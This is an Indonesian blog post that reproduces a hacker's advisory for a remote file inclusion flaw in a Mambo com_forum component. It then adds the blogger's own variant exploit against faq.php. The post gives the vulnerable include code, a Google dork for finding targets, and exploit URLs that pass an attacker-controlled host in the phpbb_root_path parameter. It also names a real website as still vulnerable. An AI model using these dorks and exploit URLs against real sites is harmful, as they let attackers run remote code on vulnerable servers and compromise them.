Melihat lihat website website exploit .. Tiba tiba suatu hari saya
menemukan adanya RFI Exploit yang diterbitkan oleh salah seorang anak
Indonesia dengan nick h4ntu ..
Hal tersebut adalah sebuah hal yang cukup menarik ..
Begini tulis nya pada artikel singkat ciptaan nya ..
[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility
download : http://mamboxchange.com/frs/download.php/6873/phpbb_component1.2.4RC3.zip
bug found in file : download.php
define('IN_PHPBB', true);
//$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc '); include($phpbb_root_path . 'common.'.$phpEx);
google dork: inurl:com_forum
http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[/code]
Melihat apa yang dia tuliskan ..
Jadi teringat akan salah satu exploit yang pernah saya temukan (Namun krn saya pelit .. belum pernah saya terbitkan .. Hehe) Exploit itu juga terjadi pada com_forum .. Hanya sedikit berbeda dari yang di ungkapkan saudara h4ntu
Perbedaan yang ada hanyalah ..
Pada bagian yang h4ntu berikan ada tertulis exploitnya sebagai berikut:
http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker]
Ubahlah download.php menjadi FAQ.php .. Hehe Thats all ..
Jadi kasarnya akan menjadi seperti ini:
http://[site]/[path]/components/com_forum/faq.php?phpbb_root_path=[attacker]
Bukan sebuah yang mengerikan memang .. Tapi sebuah alamat http://www.apple.is masih terkena serangan seperti ini .. Cukup menyedihkan xD
0 comments:
Post a Comment